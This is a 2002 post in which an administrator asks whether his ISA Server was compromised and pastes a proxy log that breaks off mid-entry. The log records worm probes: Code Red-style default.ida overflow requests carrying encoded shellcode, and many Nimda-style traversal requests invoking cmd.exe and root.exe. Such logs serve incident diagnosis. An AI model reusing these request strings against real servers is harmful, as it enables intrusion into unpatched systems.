Hello! I found in my ISA Logs "www.worm.com" ... It mean that my ISA box was compromised, or was used to attack other machines on the internet? Log attached "WEBEXTD20020212.log" - 26 Kbytes. PS: Server99 is my ISA's box hostname! On my ISA box, I have ISA sp1 applied and the last patch "w2kSP2SRollUPack1.exe" for win2000 server. Morvan.
#Software: Microsoft(R) Internet Security and Acceleration Server 2000 #Version: 1.0 #Date: 2002-02-12 06:58:14 #Fields: c-ip cs-username c-agent sc-authenticated date time s-svcname s-computername cs-referred r-host r-ip r-port time-taken cs-bytes sc-bytes cs-protocol s-operation cs-uri cs-mime-type s-object-source sc-status s-cache-info rule#1 rule#2 24.102.165.126 anonymous - N 2002-02-12 06:58:14 W3ReverseProxy SERVER99 - www.worm.com - - 18086 4039 - - GET http://www.worm.com/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a - - 12202 0x0 Default rule - 24.158.221.198 anonymous - N 2002-02-12 07:23:27 W3ReverseProxy SERVER99 - www.worm.com - - 18377 4039 - - GET http://www.worm.com/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a - - 12202 0x0 Default rule - 200.247.198.140 anonymous - N 2002-02-12 13:30:40 W3ReverseProxy SERVER99 - www - - 10 72 - - GET http://www/scripts/root.exe?/c+dir - - 12202 0x0 Default rule - 200.247.198.140 anonymous - N 2002-02-12 13:30:49 W3ReverseProxy SERVER99 - www - - - 70 - - GET http://www/MSADC/root.exe?/c+dir - - 12202 0x0 Default rule - 200.247.198.140 anonymous - N 2002-02-12 13:30:56 W3ReverseProxy SERVER99 - www - - - 80 - - GET http://www/c/winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.247.198.140 anonymous - N 2002-02-12 13:31:04 W3ReverseProxy SERVER99 - www - - - 80 - - GET http://www/d/winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.247.198.140 anonymous - N 2002-02-12 13:31:11 W3ReverseProxy SERVER99 - www - - - 96 - - GET http://www/scripts/..%255c../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.247.198.140 anonymous - N 2002-02-12 13:31:20 W3ReverseProxy SERVER99 - www - - - 117 - - GET http://www/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.247.198.140 anonymous - N 2002-02-12 14:02:34 W3ReverseProxy SERVER99 - www - - - 72 - - GET http://www/scripts/root.exe?/c+dir - - 12202 0x0 Default rule - 200.247.198.140 anonymous - N 2002-02-12 14:02:45 W3ReverseProxy SERVER99 - www - - - 70 - - GET http://www/MSADC/root.exe?/c+dir - - 12202 0x0 Default rule - 200.247.198.140 anonymous - N 2002-02-12 14:02:55 W3ReverseProxy SERVER99 - www - - - 80 - - GET http://www/c/winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.247.198.140 anonymous - N 2002-02-12 14:03:06 W3ReverseProxy SERVER99 - www - - - 80 - - GET http://www/d/winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.247.198.140 anonymous - N 2002-02-12 14:03:17 W3ReverseProxy SERVER99 - www - - - 96 - - GET http://www/scripts/..%255c../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.247.198.140 anonymous - N 2002-02-12 14:03:27 W3ReverseProxy SERVER99 - www - - - 117 - - GET http://www/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.247.198.140 anonymous - N 2002-02-12 14:03:40 W3ReverseProxy SERVER99 - www - - - 117 - - GET http://www/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.247.198.140 anonymous - N 2002-02-12 14:03:48 W3ReverseProxy SERVER99 - www - - 10 145 - - GET http://www/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.247.198.140 anonymous - N 2002-02-12 14:04:08 W3ReverseProxy SERVER99 - www - - - 97 - - GET http://www/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.247.198.140 anonymous - N 2002-02-12 14:04:17 W3ReverseProxy SERVER99 - www - - - 97 - - GET http://www/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.247.198.140 anonymous - N 2002-02-12 14:04:26 W3ReverseProxy SERVER99 - www - - - 97 - - GET http://www/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.247.198.140 anonymous - N 2002-02-12 14:04:36 W3ReverseProxy SERVER99 - www - - - 97 - - GET http://www/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.247.198.140 anonymous - N 2002-02-12 14:04:46 W3ReverseProxy SERVER99 - www - - - 98 - - GET http://www/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir - - 12005 0x0 - - 200.247.198.140 anonymous - N 2002-02-12 14:04:56 W3ReverseProxy SERVER99 - www - - - 96 - - GET http://www/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir - - 12005 0x0 - - 200.247.198.140 anonymous - N 2002-02-12 14:05:04 W3ReverseProxy SERVER99 - www - - - 100 - - GET http://www/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.247.198.140 anonymous - N 2002-02-12 14:05:13 W3ReverseProxy SERVER99 - www - - 10 96 - - GET http://www/scripts/..%252f../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.247.198.140 anonymous - N 2002-02-12 14:13:49 W3ReverseProxy SERVER99 - www - - - 72 - - GET http://www/scripts/root.exe?/c+dir - - 12202 0x0 Default rule - 200.11.200.148 anonymous - N 2002-02-12 14:26:02 W3ReverseProxy SERVER99 - www - - - 72 - - GET http://www/scripts/root.exe?/c+dir - - 12202 0x0 Default rule - 200.11.200.148 anonymous - N 2002-02-12 14:26:06 W3ReverseProxy SERVER99 - www - - - 70 - - GET http://www/MSADC/root.exe?/c+dir - - 12202 0x0 Default rule - 200.11.200.148 anonymous - N 2002-02-12 14:26:09 W3ReverseProxy SERVER99 - www - - - 80 - - GET http://www/c/winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.11.200.148 anonymous - N 2002-02-12 14:26:15 W3ReverseProxy SERVER99 - www - - - 80 - - GET http://www/d/winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.11.200.148 anonymous - N 2002-02-12 14:26:19 W3ReverseProxy SERVER99 - www - - - 96 - - GET http://www/scripts/..%255c../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.11.200.148 anonymous - N 2002-02-12 14:26:25 W3ReverseProxy SERVER99 - www - - - 117 - - GET http://www/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.11.200.148 anonymous - N 2002-02-12 14:26:29 W3ReverseProxy SERVER99 - www - - - 117 - - GET http://www/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.11.200.148 anonymous - N 2002-02-12 14:26:43 W3ReverseProxy SERVER99 - www - - - 145 - - GET http://www/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.11.200.148 anonymous - N 2002-02-12 14:26:50 W3ReverseProxy SERVER99 - www - - - 97 - - GET http://www/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.11.200.148 anonymous - N 2002-02-12 14:26:54 W3ReverseProxy SERVER99 - www - - - 97 - - GET http://www/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.11.200.148 anonymous - N 2002-02-12 14:26:57 W3ReverseProxy SERVER99 - www - - - 97 - - GET http://www/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.11.200.148 anonymous - N 2002-02-12 14:27:02 W3ReverseProxy SERVER99 - www - - - 97 - - GET http://www/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.11.200.148 anonymous - N 2002-02-12 14:27:06 W3ReverseProxy SERVER99 - www - - - 98 - - GET http://www/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir - - 12005 0x0 - - 200.11.200.148 anonymous - N 2002-02-12 14:27:17 W3ReverseProxy SERVER99 - www - - - 96 - - GET http://www/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir - - 12005 0x0 - - 200.11.200.148 anonymous - N 2002-02-12 14:27:20 W3ReverseProxy SERVER99 - www - - - 100 - - GET http://www/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.11.200.148 anonymous - N 2002-02-12 14:27:26 W3ReverseProxy SERVER99 - www - - - 96 - - GET http://www/scripts/..%252f../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.247.198.140 anonymous - N 2002-02-12 14:48:32 W3ReverseProxy SERVER99 - www - - - 72 - - GET http://www/scripts/root.exe?/c+dir - - 12202 0x0 Default rule - 200.247.198.140 anonymous - N 2002-02-12 14:48:37 W3ReverseProxy SERVER99 - www - - - 70 - - GET http://www/MSADC/root.exe?/c+dir - - 12202 0x0 Default rule - 200.247.198.140 anonymous - N 2002-02-12 14:48:42 W3ReverseProxy SERVER99 - www - - 10 80 - - GET http://www/c/winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.247.198.140 anonymous - N 2002-02-12 14:48:49 W3ReverseProxy SERVER99 - www - - - 80 - - GET http://www/d/winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.247.198.140 anonymous - N 2002-02-12 14:48:57 W3ReverseProxy SERVER99 - www - - - 96 - - GET http://www/scripts/..%255c../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.247.198.140 anonymous - N 2002-02-12 14:49:06 W3ReverseProxy SERVER99 - www - - - 117 - - GET http://www/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.247.198.140 anonymous - N 2002-02-12 14:49:17 W3ReverseProxy SERVER99 - www - - - 117 - - GET http://www/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.247.198.140 anonymous - N 2002-02-12 14:49:28 W3ReverseProxy SERVER99 - www - - - 145 - - GET http://www/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.48.238.12 anonymous - N 2002-02-12 15:01:09 W3ReverseProxy SERVER99 - www - - - 72 - - GET http://www/scripts/root.exe?/c+dir - - 12202 0x0 Default rule - 200.48.238.12 anonymous - N 2002-02-12 15:01:12 W3ReverseProxy SERVER99 - www - - - 70 - - GET http://www/MSADC/root.exe?/c+dir - - 12202 0x0 Default rule - 200.48.238.12 anonymous - N 2002-02-12 15:01:16 W3ReverseProxy SERVER99 - www - - - 80 - - GET http://www/c/winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.48.238.12 anonymous - N 2002-02-12 15:01:19 W3ReverseProxy SERVER99 - www - - - 80 - - GET http://www/d/winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.48.238.12 anonymous - N 2002-02-12 15:01:23 W3ReverseProxy SERVER99 - www - - - 96 - - GET http://www/scripts/..%255c../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.48.238.12 anonymous - N 2002-02-12 15:01:26 W3ReverseProxy SERVER99 - www - - - 117 - - GET http://www/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.48.238.12 anonymous - N 2002-02-12 15:01:29 W3ReverseProxy SERVER99 - www - - - 117 - - GET http://www/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.48.238.12 anonymous - N 2002-02-12 15:01:32 W3ReverseProxy SERVER99 - www - - - 145 - - GET http://www/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.190.217.30 anonymous - N 2002-02-12 15:20:56 W3ReverseProxy SERVER99 - www - - - 72 - - GET http://www/scripts/root.exe?/c+dir - - 12202 0x0 Default rule - 200.190.217.30 anonymous - N 2002-02-12 15:20:57 W3ReverseProxy SERVER99 - www - - - 70 - - GET http://www/MSADC/root.exe?/c+dir - - 12202 0x0 Default rule - 200.190.217.30 anonymous - N 2002-02-12 15:20:57 W3ReverseProxy SERVER99 - www - - - 80 - - GET http://www/c/winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.190.217.30 anonymous - N 2002-02-12 15:20:57 W3ReverseProxy SERVER99 - www - - - 80 - - GET http://www/d/winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.190.217.30 anonymous - N 2002-02-12 15:20:58 W3ReverseProxy SERVER99 - www - - - 96 - - GET http://www/scripts/..%255c../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.190.217.30 anonymous - N 2002-02-12 15:20:58 W3ReverseProxy SERVER99 - www - - - 117 - - GET http://www/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.190.217.30 anonymous - N 2002-02-12 15:20:58 W3ReverseProxy SERVER99 - www - - - 117 - - GET http://www/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.190.217.30 anonymous - N 2002-02-12 15:20:59 W3ReverseProxy SERVER99 - www - - 10 145 - - GET http://www/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.190.217.30 anonymous - N 2002-02-12 15:20:59 W3ReverseProxy SERVER99 - www - - - 97 - - GET http://www/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.190.217.30 anonymous - N 2002-02-12 15:21:00 W3ReverseProxy SERVER99 - www - - - 97 - - GET http://www/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.190.217.30 anonymous - N 2002-02-12 15:21:01 W3ReverseProxy SERVER99 - www - - - 97 - - GET http://www/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.190.217.30 anonymous - N 2002-02-12 15:21:02 W3ReverseProxy SERVER99 - www - - - 97 - - GET http://www/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.190.217.30 anonymous - N 2002-02-12 15:21:02 W3ReverseProxy SERVER99 - www - - - 98 - - GET http://www/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir - - 12005 0x0 - - 200.190.217.30 anonymous - N 2002-02-12 15:21:03 W3ReverseProxy SERVER99 - www - - - 96 - - GET http://www/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir - - 12005 0x0 - - 200.190.217.30 anonymous - N 2002-02-12 15:21:04 W3ReverseProxy SERVER99 - www - - - 100 - - GET http://www/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.190.217.30 anonymous - N 2002-02-12 15:21:05 W3ReverseProxy SERVER99 - www - - - 96 - - GET http://www/scripts/..%252f../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 218.65.190.138 anonymous - N 2002-02-12 17:03:08 W3ReverseProxy SERVER99 - www.worm.com - - 18517 4039 - - GET http://www.worm.com/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a - - 12202 0x0 Default rule - 216.39.237.69 anonymous - N 2002-02-12 17:35:18 W3ReverseProxy SERVER99 - www.worm.com - - 18447 4039 - - GET http://www.worm.com/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a - - 12202 0x0 Default rule - 134.59.27.31 anonymous - N 2002-02-12 18:26:06 W3ReverseProxy SERVER99 - www.worm.com - - 18346 4039 - - GET http://www.worm.com/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a - - 12202 0x0 Default rule - 200.4.141.69 anonymous - N 2002-02-12 18:52:48 W3ReverseProxy SERVER99 - www - - - 72 - - GET http://www/scripts/root.exe?/c+dir - - 12202 0x0 Default rule - 200.4.141.69 anonymous - N 2002-02-12 18:52:50 W3ReverseProxy SERVER99 - www - - - 70 - - GET http://www/MSADC/root.exe?/c+dir - - 12202 0x0 Default rule - 200.4.141.69 anonymous - N 2002-02-12 18:52:53 W3ReverseProxy SERVER99 - www - - - 80 - - GET http://www/c/winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.4.141.69 anonymous - N 2002-02-12 18:52:59 W3ReverseProxy SERVER99 - www - - - 80 - - GET http://www/d/winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.4.141.69 anonymous - N 2002-02-12 18:53:02 W3ReverseProxy SERVER99 - www - - - 96 - - GET http://www/scripts/..%255c../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.4.141.69 anonymous - N 2002-02-12 18:53:08 W3ReverseProxy SERVER99 - www - - - 117 - - GET http://www/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.4.141.69 anonymous - N 2002-02-12 18:53:11 W3ReverseProxy SERVER99 - www - - - 117 - - GET http://www/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.4.141.69 anonymous - N 2002-02-12 18:53:14 W3ReverseProxy SERVER99 - www - - - 145 - - GET http://www/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.4.141.69 anonymous - N 2002-02-12 18:53:16 W3ReverseProxy SERVER99 - www - - - 97 - - GET http://www/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.4.141.69 anonymous - N 2002-02-12 18:53:23 W3ReverseProxy SERVER99 - www - - - 97 - - GET http://www/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.4.141.69 anonymous - N 2002-02-12 18:53:25 W3ReverseProxy SERVER99 - www - - - 97 - - GET http://www/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.4.141.64 anonymous - N 2002-02-12 19:01:17 W3ReverseProxy SERVER99 - www - - - 72 - - GET http://www/scripts/root.exe?/c+dir - - 12202 0x0 Default rule - 200.4.141.64 anonymous - N 2002-02-12 19:01:20 W3ReverseProxy SERVER99 - www - - - 70 - - GET http://www/MSADC/root.exe?/c+dir - - 12202 0x0 Default rule - 200.4.141.64 anonymous - N 2002-02-12 19:01:23 W3ReverseProxy SERVER99 - www - - - 80 - - GET http://www/c/winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.4.141.64 anonymous - N 2002-02-12 19:01:28 W3ReverseProxy SERVER99 - www - - - 80 - - GET http://www/d/winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.4.141.64 anonymous - N 2002-02-12 19:01:31 W3ReverseProxy SERVER99 - www - - - 96 - - GET http://www/scripts/..%255c../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.4.141.64 anonymous - N 2002-02-12 19:01:34 W3ReverseProxy SERVER99 - www - - - 117 - - GET http://www/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.4.141.64 anonymous - N 2002-02-12 19:01:49 W3ReverseProxy SERVER99 - www - - - 117 - - GET http://www/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.4.141.64 anonymous - N 2002-02-12 19:01:52 W3ReverseProxy SERVER99 - www - - - 145 - - GET http://www/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.4.141.64 anonymous - N 2002-02-12 19:01:57 W3ReverseProxy SERVER99 - www - - - 97 - - GET http://www/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.4.141.64 anonymous - N 2002-02-12 19:02:00 W3ReverseProxy SERVER99 - www - - - 97 - - GET http://www/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.4.141.64 anonymous - N 2002-02-12 19:02:03 W3ReverseProxy SERVER99 - www - - - 97 - - GET http://www/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.4.141.64 anonymous - N 2002-02-12 19:02:06 W3ReverseProxy SERVER99 - www - - - 97 - - GET http://www/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.4.141.64 anonymous - N 2002-02-12 19:02:08 W3ReverseProxy SERVER99 - www - - - 98 - - GET http://www/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir - - 12005 0x0 - - 200.4.141.64 anonymous - N 2002-02-12 19:02:11 W3ReverseProxy SERVER99 - www - - - 96 - - GET http://www/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir - - 12005 0x0 - - 200.4.141.64 anonymous - N 2002-02-12 19:02:14 W3ReverseProxy SERVER99 - www - - - 100 - - GET http://www/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.4.141.64 anonymous - N 2002-02-12 19:02:17 W3ReverseProxy SERVER99 - www - - - 96 - - GET http://www/scripts/..%252f../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 202.99.11.193 anonymous - N 2002-02-12 19:18:06 W3ReverseProxy SERVER99 - www.worm.com - - 18517 4039 - - GET http://www.worm.com/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a - - 12202 0x0 Default rule - 200.168.121.104 anonymous - N 2002-02-12 21:14:09 W3ReverseProxy SERVER99 - www - - - 72 - - GET http://www/scripts/root.exe?/c+dir - - 12202 0x0 Default rule - 200.168.121.104 anonymous - N 2002-02-12 21:14:09 W3ReverseProxy SERVER99 - www - - 10 70 - - GET http://www/MSADC/root.exe?/c+dir - - 12202 0x0 Default rule - 200.168.121.104 anonymous - N 2002-02-12 21:14:10 W3ReverseProxy SERVER99 - www - - 10 80 - - GET http://www/c/winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.168.121.104 anonymous - N 2002-02-12 21:14:10 W3ReverseProxy SERVER99 - www - - - 80 - - GET http://www/d/winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.168.121.104 anonymous - N 2002-02-12 21:14:11 W3ReverseProxy SERVER99 - www - - - 96 - - GET http://www/scripts/..%255c../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.168.121.104 anonymous - N 2002-02-12 21:14:11 W3ReverseProxy SERVER99 - www - - - 117 - - GET http://www/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.168.121.104 anonymous - N 2002-02-12 21:14:12 W3ReverseProxy SERVER99 - www - - - 117 - - GET http://www/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.39.223.248 anonymous - N 2002-02-12 21:16:25 W3ReverseProxy SERVER99 - www - - - 72 - - GET http://www/scripts/root.exe?/c+dir - - 12202 0x0 Default rule - 200.39.223.248 anonymous - N 2002-02-12 21:16:27 W3ReverseProxy SERVER99 - www - - - 70 - - GET http://www/MSADC/root.exe?/c+dir - - 12202 0x0 Default rule - 200.39.223.248 anonymous - N 2002-02-12 21:16:30 W3ReverseProxy SERVER99 - www - - - 80 - - GET http://www/c/winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.39.223.248 anonymous - N 2002-02-12 21:16:32 W3ReverseProxy SERVER99 - www - - - 80 - - GET http://www/d/winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.39.223.248 anonymous - N 2002-02-12 21:16:34 W3ReverseProxy SERVER99 - www - - - 96 - - GET http://www/scripts/..%255c../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.39.223.248 anonymous - N 2002-02-12 21:16:36 W3ReverseProxy SERVER99 - www - - - 117 - - GET http://www/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.39.223.248 anonymous - N 2002-02-12 21:16:38 W3ReverseProxy SERVER99 - www - - - 117 - - GET http://www/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.39.223.248 anonymous - N 2002-02-12 21:16:40 W3ReverseProxy SERVER99 - www - - - 145 - - GET http://www/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.39.223.248 anonymous - N 2002-02-12 21:16:42 W3ReverseProxy SERVER99 - www - - - 97 - - GET http://www/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.39.223.248 anonymous - N 2002-02-12 21:16:44 W3ReverseProxy SERVER99 - www - - - 97 - - GET http://www/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.39.223.248 anonymous - N 2002-02-12 21:16:46 W3ReverseProxy SERVER99 - www - - - 97 - - GET http://www/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir - - 12202 0x0 Default rule - 200.39.223.248 anonymous - N 2002-02-12 21:16:48 W3ReverseProxy SERVER99 - www - - - 97 - - 